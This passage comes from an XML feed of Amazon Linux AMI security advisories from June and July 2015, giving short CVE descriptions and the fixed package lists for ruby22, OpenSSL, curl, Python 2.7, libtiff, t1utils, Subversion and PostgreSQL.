</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3900" title="" id="CVE-2015-3900" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4020" title="" id="CVE-2015-4020" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="rubygems21" version="2.2.3" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems21-2.2.3-1.17.amzn1.noarch.rpm</filename></package><package name="ruby21-libs" version="2.1.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-libs-2.1.6-1.17.amzn1.x86_64.rpm</filename></package><package name="rubygems21-devel" version="2.2.3" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems21-devel-2.2.3-1.17.amzn1.noarch.rpm</filename></package><package name="rubygem21-bigdecimal" version="1.2.4" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-bigdecimal-1.2.4-1.17.amzn1.x86_64.rpm</filename></package><package name="ruby21-debuginfo" version="2.1.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-debuginfo-2.1.6-1.17.amzn1.x86_64.rpm</filename></package><package name="ruby21-devel" version="2.1.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-devel-2.1.6-1.17.amzn1.x86_64.rpm</filename></package><package name="ruby21-doc" version="2.1.6" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby21-doc-2.1.6-1.17.amzn1.noarch.rpm</filename></package><package name="ruby21-irb" version="2.1.6" release="1.17.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby21-irb-2.1.6-1.17.amzn1.noarch.rpm</filename></package><package name="rubygem21-psych" version="2.0.5" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-psych-2.0.5-1.17.amzn1.x86_64.rpm</filename></package><package name="ruby21" version="2.1.6" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby21-2.1.6-1.17.amzn1.x86_64.rpm</filename></package><package name="rubygem21-io-console" version="0.4.3" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem21-io-console-0.4.3-1.17.amzn1.x86_64.rpm</filename></package><package name="ruby21-devel" version="2.1.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-devel-2.1.6-1.17.amzn1.i686.rpm</filename></package><package name="ruby21-libs" version="2.1.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-libs-2.1.6-1.17.amzn1.i686.rpm</filename></package><package name="ruby21" version="2.1.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-2.1.6-1.17.amzn1.i686.rpm</filename></package><package name="rubygem21-bigdecimal" version="1.2.4" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-bigdecimal-1.2.4-1.17.amzn1.i686.rpm</filename></package><package name="rubygem21-io-console" version="0.4.3" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-io-console-0.4.3-1.17.amzn1.i686.rpm</filename></package><package name="ruby21-debuginfo" version="2.1.6" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/ruby21-debuginfo-2.1.6-1.17.amzn1.i686.rpm</filename></package><package name="rubygem21-psych" version="2.0.5" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem21-psych-2.0.5-1.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-549</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-549: medium priority package update for ruby22</title><issued date="2015-06-16 10:30:00" /><updated date="2015-06-18 20:44:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4020:
Incomplete fix for CVE-2015-3900, which allowed redirection to an arbitrary gem server in any security domain.
CVE-2015-3900:
RubyGems did not validate the hostname returned in the SRV record before sending requests to it.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3900" title="" id="CVE-2015-3900" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4020" title="" id="CVE-2015-4020" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ruby22-devel" version="2.2.2" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-devel-2.2.2-1.6.amzn1.x86_64.rpm</filename></package><package name="ruby22-doc" version="2.2.2" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby22-doc-2.2.2-1.6.amzn1.noarch.rpm</filename></package><package name="ruby22-libs" version="2.2.2" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-libs-2.2.2-1.6.amzn1.x86_64.rpm</filename></package><package name="rubygem22-io-console" version="0.4.3" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-io-console-0.4.3-1.6.amzn1.x86_64.rpm</filename></package><package name="ruby22-debuginfo" version="2.2.2" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-debuginfo-2.2.2-1.6.amzn1.x86_64.rpm</filename></package><package name="ruby22-irb" version="2.2.2" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/ruby22-irb-2.2.2-1.6.amzn1.noarch.rpm</filename></package><package name="rubygems22-devel" version="2.4.5" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems22-devel-2.4.5-1.6.amzn1.noarch.rpm</filename></package><package name="rubygem22-psych" version="2.0.8" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-psych-2.0.8-1.6.amzn1.x86_64.rpm</filename></package><package name="rubygems22" version="2.4.5" release="1.6.amzn1" epoch="0" arch="noarch"><filename>Packages/rubygems22-2.4.5-1.6.amzn1.noarch.rpm</filename></package><package name="rubygem22-bigdecimal" version="1.2.6" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/rubygem22-bigdecimal-1.2.6-1.6.amzn1.x86_64.rpm</filename></package><package name="ruby22" version="2.2.2" release="1.6.amzn1" epoch="0" arch="x86_64"><filename>Packages/ruby22-2.2.2-1.6.amzn1.x86_64.rpm</filename></package><package name="rubygem22-io-console" version="0.4.3" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-io-console-0.4.3-1.6.amzn1.i686.rpm</filename></package><package name="ruby22-devel" version="2.2.2" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-devel-2.2.2-1.6.amzn1.i686.rpm</filename></package><package name="ruby22-libs" version="2.2.2" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-libs-2.2.2-1.6.amzn1.i686.rpm</filename></package><package name="ruby22-debuginfo" version="2.2.2" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-debuginfo-2.2.2-1.6.amzn1.i686.rpm</filename></package><package name="rubygem22-bigdecimal" version="1.2.6" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-bigdecimal-1.2.6-1.6.amzn1.i686.rpm</filename></package><package name="rubygem22-psych" version="2.0.8" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/rubygem22-psych-2.0.8-1.6.amzn1.i686.rpm</filename></package><package name="ruby22" version="2.2.2" release="1.6.amzn1" epoch="0" arch="i686"><filename>Packages/ruby22-2.2.2-1.6.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-550</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-550: medium priority package update for openssl</title><issued date="2015-06-16 11:29:00" /><updated date="2015-06-16 11:46:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-4000:
A flaw was found in the way the TLS protocol composes the Diffie-Hellman exchange (for both export and non-export grade cipher suites). An attacker could use this flaw to downgrade a DHE connection to use export-grade key sizes, which could then be broken by sufficient pre-computation. This can lead to a passive man-in-the-middle attack in which the attacker is able to decrypt all traffic.
1223211:
CVE-2015-4000 LOGJAM: TLS connections which support export grade DHE key-exchange are vulnerable to MITM attacks
CVE-2015-3216:
A regression was found in the versions of OpenSSL shipped with Red Hat Enterprise Linux 6 and 7, in the ssleay_rand_bytes() function. This could lead a multi-threaded application to crash.
1227574:
CVE-2015-3216 openssl: Crash in ssleay_rand_bytes due to locking regression
CVE-2015-1792:
A denial of service flaw was found in OpenSSL in the way it verified certain signed messages using CMS (Cryptographic Message Syntax). A remote attacker could cause an application using OpenSSL to use excessive amounts of memory by sending a specially-crafted message for verification.
1228607:
CVE-2015-1792 OpenSSL: CMS verify infinite loop with unknown hash function
CVE-2015-1791:
A race condition was found in the session handling code of OpenSSL. An attacker could cause a multi-threaded SSL/TLS server to crash.
1228608:
CVE-2015-1791 OpenSSL: Race condition handling NewSessionTicket
CVE-2015-1790:
A NULL pointer dereference was found in the way OpenSSL handled certain PKCS#7 inputs. An attacker able to make an application using OpenSSL verify, decrypt, or parse a specially crafted PKCS#7 input could cause that application to crash. TLS/SSL clients and servers using OpenSSL were not affected by this flaw.
1228604:
CVE-2015-1790 OpenSSL: PKCS7 crash with missing EnvelopedContent
CVE-2015-1789:
An out-of-bounds read flaw was found in the X509_cmp_time() function of OpenSSL, which is used to test the expiry dates of SSL/TLS certificates. An attacker could possibly use a specially-crafted SSL/TLS certificate or CRL (Certificate Revocation List), which when parsed by an application would cause that application to crash.
1228603:
CVE-2015-1789 OpenSSL: out-of-bounds read in X509_cmp_time
CVE-2014-8176:
An invalid-free flaw was found in the way OpenSSL handled certain DTLS handshake messages. A malicious DTLS client or server could send a specially-crafted message to the peer, which could cause the application to crash or potentially cause arbitrary code execution.
1228611:
CVE-2014-8176 OpenSSL: Invalid free in DTLS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8176" title="" id="CVE-2014-8176" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1789" title="" id="CVE-2015-1789" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1790" title="" id="CVE-2015-1790" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1791" title="" id="CVE-2015-1791" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1792" title="" id="CVE-2015-1792" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3216" title="" id="CVE-2015-3216" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4000" title="" id="CVE-2015-4000" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssl" version="1.0.1k" release="10.86.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-1.0.1k-10.86.amzn1.x86_64.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="10.86.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-static-1.0.1k-10.86.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="10.86.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-devel-1.0.1k-10.86.amzn1.x86_64.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="10.86.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-debuginfo-1.0.1k-10.86.amzn1.x86_64.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="10.86.amzn1" epoch="1" arch="x86_64"><filename>Packages/openssl-perl-1.0.1k-10.86.amzn1.x86_64.rpm</filename></package><package name="openssl-devel" version="1.0.1k" release="10.86.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-devel-1.0.1k-10.86.amzn1.i686.rpm</filename></package><package name="openssl-static" version="1.0.1k" release="10.86.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-static-1.0.1k-10.86.amzn1.i686.rpm</filename></package><package name="openssl" version="1.0.1k" release="10.86.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-1.0.1k-10.86.amzn1.i686.rpm</filename></package><package name="openssl-perl" version="1.0.1k" release="10.86.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-perl-1.0.1k-10.86.amzn1.i686.rpm</filename></package><package name="openssl-debuginfo" version="1.0.1k" release="10.86.amzn1" epoch="1" arch="i686"><filename>Packages/openssl-debuginfo-1.0.1k-10.86.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-551</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-551: medium priority package update for curl</title><issued date="2015-06-18 20:48:00" /><updated date="2015-06-18 20:57:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3237:
libcurl can get tricked by a malicious SMB server to send off data it did not intend to.
CVE-2015-3236:
libcurl can wrongly send HTTP credentials when re-using connections.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3236" title="" id="CVE-2015-3236" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3237" title="" id="CVE-2015-3237" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl" version="7.40.0" release="3.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.40.0-3.51.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.40.0" release="3.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.40.0-3.51.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.40.0" release="3.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.40.0-3.51.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.40.0" release="3.51.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.40.0-3.51.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.40.0" release="3.51.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.40.0-3.51.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.40.0" release="3.51.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.40.0-3.51.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.40.0" release="3.51.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.40.0-3.51.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.40.0" release="3.51.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.40.0-3.51.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-552</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-552: medium priority package update for python27</title><issued date="2015-06-22 10:31:00" /><updated date="2017-08-31 22:55:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-9365:
The Python standard library HTTP client modules (such as httplib or urllib) did not perform verification of TLS/SSL certificates when connecting to HTTPS servers. A man-in-the-middle attacker could use this flaw to hijack connections and eavesdrop or modify transferred data.
1173041:
CVE-2014-9365 python: failure to validate certificates in the HTTP client with TLS (PEP 476)
CVE-2013-1753:
It was discovered that the Python xmlrpclib did not restrict the size of a gzip compressed HTTP responses. A malicious XMLRPC server could cause an XMLRPC client using xmlrpclib to consume an excessive amount of memory.
1046170:
CVE-2013-1753 python: XMLRPC library unrestricted decompression of HTTP responses using gzip enconding
CVE-2013-1752:
It was discovered that multiple Python standard library modules implementing network protocols (such as httplib or smtplib) failed to restrict sizes of server responses. A malicious server could cause a client using one of the affected modules to consume an excessive amount of memory.
1046174:
CVE-2013-1752 python: multiple unbound readline() DoS flaws in python stdlib
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1752" title="" id="CVE-2013-1752" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1753" title="" id="CVE-2013-1753" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9365" title="" id="CVE-2014-9365" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27" version="2.7.9" release="4.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.9-4.114.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.9" release="4.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.9-4.114.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.9" release="4.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.9-4.114.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.9" release="4.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.9-4.114.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.9" release="4.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.9-4.114.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.9" release="4.114.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.9-4.114.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.9" release="4.114.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.9-4.114.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.9" release="4.114.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.9-4.114.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.9" release="4.114.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.9-4.114.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.9" release="4.114.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.9-4.114.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.9" release="4.114.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.9-4.114.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.9" release="4.114.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.9-4.114.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-553</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-553: medium priority package update for libtiff</title><issued date="2015-06-22 15:07:00" /><updated date="2015-06-24 10:14:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-1547:
1190709:
CVE-2015-1547 libtiff: use of uninitialized memory in NeXTDecode
CVE-2014-9655:
1190703:
CVE-2014-9655 libtiff: use of uninitialized memory in putcontig8bitYCbCr21tile and NeXTDecode
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9655" title="" id="CVE-2014-9655" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1547" title="" id="CVE-2015-1547" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libtiff-debuginfo" version="4.0.3" release="20.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-debuginfo-4.0.3-20.20.amzn1.x86_64.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="20.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-devel-4.0.3-20.20.amzn1.x86_64.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="20.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-static-4.0.3-20.20.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="20.20.amzn1" epoch="0" arch="x86_64"><filename>Packages/libtiff-4.0.3-20.20.amzn1.x86_64.rpm</filename></package><package name="libtiff" version="4.0.3" release="20.20.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-4.0.3-20.20.amzn1.i686.rpm</filename></package><package name="libtiff-debuginfo" version="4.0.3" release="20.20.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-debuginfo-4.0.3-20.20.amzn1.i686.rpm</filename></package><package name="libtiff-devel" version="4.0.3" release="20.20.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-devel-4.0.3-20.20.amzn1.i686.rpm</filename></package><package name="libtiff-static" version="4.0.3" release="20.20.amzn1" epoch="0" arch="i686"><filename>Packages/libtiff-static-4.0.3-20.20.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-554</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-554: medium priority package update for t1utils</title><issued date="2015-06-22 20:26:00" /><updated date="2015-06-24 10:14:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3905:
A buffer overflow flaw was found in the way t1utils processed, for example, certain PFB (Printer Font Binary) files. An attacker could use this flaw to potentially execute arbitrary code by tricking a user into processing a specially crafted PFB file with t1utils.
1218365:
CVE-2015-3905 t1utils: buffer overflow flaw
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3905" title="" id="CVE-2015-3905" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="t1utils-debuginfo" version="1.39" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/t1utils-debuginfo-1.39-1.3.amzn1.x86_64.rpm</filename></package><package name="t1utils" version="1.39" release="1.3.amzn1" epoch="0" arch="x86_64"><filename>Packages/t1utils-1.39-1.3.amzn1.x86_64.rpm</filename></package><package name="t1utils" version="1.39" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/t1utils-1.39-1.3.amzn1.i686.rpm</filename></package><package name="t1utils-debuginfo" version="1.39" release="1.3.amzn1" epoch="0" arch="i686"><filename>Packages/t1utils-debuginfo-1.39-1.3.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-555</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-555: medium priority package update for mod_dav_svn subversion</title><issued date="2015-06-24 10:08:00" /><updated date="2015-06-24 10:15:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8108:
A NULL pointer dereference flaw was found in the way the mod_dav_svn module handled certain requests for URIs that trigger a lookup of a virtual transaction name. A remote, unauthenticated attacker could send a request for a virtual transaction name that does not exist, causing mod_dav_svn to crash.
1174057:
CVE-2014-8108 subversion: NULL pointer dereference flaw in mod_dav_svn when handling URIs for virtual transaction names
CVE-2014-3580:
A NULL pointer dereference flaw was found in the way the mod_dav_svn module handled REPORT requests. A remote, unauthenticated attacker could use a specially crafted REPORT request to crash mod_dav_svn.
1174054:
CVE-2014-3580 subversion: NULL pointer dereference flaw in mod_dav_svn when handling REPORT requests
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3580" title="" id="CVE-2014-3580" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8108" title="" id="CVE-2014-8108" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="subversion-ruby" version="1.8.11" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-ruby-1.8.11-1.50.amzn1.x86_64.rpm</filename></package><package name="subversion-tools" version="1.8.11" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-tools-1.8.11-1.50.amzn1.x86_64.rpm</filename></package><package name="mod24_dav_svn" version="1.8.11" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_dav_svn-1.8.11-1.50.amzn1.x86_64.rpm</filename></package><package name="subversion-javahl" version="1.8.11" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-javahl-1.8.11-1.50.amzn1.x86_64.rpm</filename></package><package name="subversion-devel" version="1.8.11" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-devel-1.8.11-1.50.amzn1.x86_64.rpm</filename></package><package name="subversion-debuginfo" version="1.8.11" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-debuginfo-1.8.11-1.50.amzn1.x86_64.rpm</filename></package><package name="subversion-perl" version="1.8.11" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-perl-1.8.11-1.50.amzn1.x86_64.rpm</filename></package><package name="subversion" version="1.8.11" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-1.8.11-1.50.amzn1.x86_64.rpm</filename></package><package name="subversion-python27" version="1.8.11" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python27-1.8.11-1.50.amzn1.x86_64.rpm</filename></package><package name="subversion-python26" version="1.8.11" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-python26-1.8.11-1.50.amzn1.x86_64.rpm</filename></package><package name="subversion-libs" version="1.8.11" release="1.50.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-libs-1.8.11-1.50.amzn1.x86_64.rpm</filename></package><package name="subversion-python26" version="1.8.11" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python26-1.8.11-1.50.amzn1.i686.rpm</filename></package><package name="subversion-javahl" version="1.8.11" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-javahl-1.8.11-1.50.amzn1.i686.rpm</filename></package><package name="subversion-debuginfo" version="1.8.11" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-debuginfo-1.8.11-1.50.amzn1.i686.rpm</filename></package><package name="subversion-tools" version="1.8.11" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-tools-1.8.11-1.50.amzn1.i686.rpm</filename></package><package name="subversion" version="1.8.11" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-1.8.11-1.50.amzn1.i686.rpm</filename></package><package name="subversion-python27" version="1.8.11" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-python27-1.8.11-1.50.amzn1.i686.rpm</filename></package><package name="subversion-perl" version="1.8.11" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-perl-1.8.11-1.50.amzn1.i686.rpm</filename></package><package name="subversion-ruby" version="1.8.11" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-ruby-1.8.11-1.50.amzn1.i686.rpm</filename></package><package name="subversion-devel" version="1.8.11" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-devel-1.8.11-1.50.amzn1.i686.rpm</filename></package><package name="mod24_dav_svn" version="1.8.11" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_dav_svn-1.8.11-1.50.amzn1.i686.rpm</filename></package><package name="subversion-libs" version="1.8.11" release="1.50.amzn1" epoch="0" arch="i686"><filename>Packages/subversion-libs-1.8.11-1.50.amzn1.i686.rpm</filename></package><package name="mod_dav_svn" version="1.8.11" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-1.8.11-1.49.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn-debuginfo" version="1.8.11" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-debuginfo-1.8.11-1.49.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn" version="1.8.11" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-1.8.11-1.49.amzn1.i686.rpm</filename></package><package name="mod_dav_svn-debuginfo" version="1.8.11" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-debuginfo-1.8.11-1.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-556</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-556: medium priority package update for postgresql8</title><issued date="2015-07-07 12:29:00" /><updated date="2015-07-07 22:25:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-3167:
It was discovered that the pgcrypto module could return different error messages when decrypting certain data with an incorrect key. This can help an authenticated user to launch a possible cryptographic attack, although no suitable attack is currently known.
CVE-2015-3166:
It was discovered that PostgreSQL did not properly check the return values of certain standard library functions. If the system is in a state that would cause the standard library functions to fail, for example memory exhaustion, an authenticated user could exploit this flaw to disclose partial memory contents or cause the GSSAPI authentication to use an incorrect keytab file.
CVE-2015-3165:
A double-free flaw was found in the connection handling. An unauthenticated attacker could exploit this flaw to crash the PostgreSQL back end by disconnecting at approximately the same time as the authentication time out is triggered.
